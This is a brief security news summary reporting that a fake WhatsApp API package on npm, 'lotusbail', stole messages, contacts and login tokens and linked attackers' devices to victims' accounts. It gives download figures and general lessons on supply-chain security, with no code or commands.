Malicious npm Package 'lotusbail' Steals WhatsApp Data and Credentials

Fake WhatsApp API Package on npm Steals Messages, Contacts, and Login Tokens

A malicious npm package disguised as a WhatsApp API, named “lotusbail,” has been discovered stealing user data and granting attackers persistent access to WhatsApp accounts. The package has been downloaded over 56,000 times since its initial upload in May 2025, demonstrating the scale of potential compromise.

Why This Matters

Current software supply chain security practices often fail to detect malicious code hidden within seemingly functional packages. Static analysis may approve code that works without identifying its hidden, nefarious intent. This incident highlights the risk of relying solely on reputation systems and the need for dynamic analysis to uncover malicious behavior, as 56,000 downloads didn’t flag the package as malicious. The cost of a compromised WhatsApp account can include data breaches, financial loss, and reputational damage.

Key Insights

• 56,000+ downloads: “lotusbail” package downloads as of December 22, 2025.
• WebSocket Wrapper: The malware uses a malicious WebSocket wrapper to intercept authentication information and messages.
• Persistent Backdoor: The package creates a persistent backdoor by linking the attacker’s device to the victim’s WhatsApp account during authentication.

Practical Applications

• Use Case: Developers seeking a simple WhatsApp API integration unknowingly introduce a backdoor into their applications.
• Pitfall: Assuming package functionality guarantees safety; failing to analyze package behavior beyond basic functionality testing.

References:

• https://thehackernews.com/2025/12/fake-whatsapp-api-package-on-npm-steals.html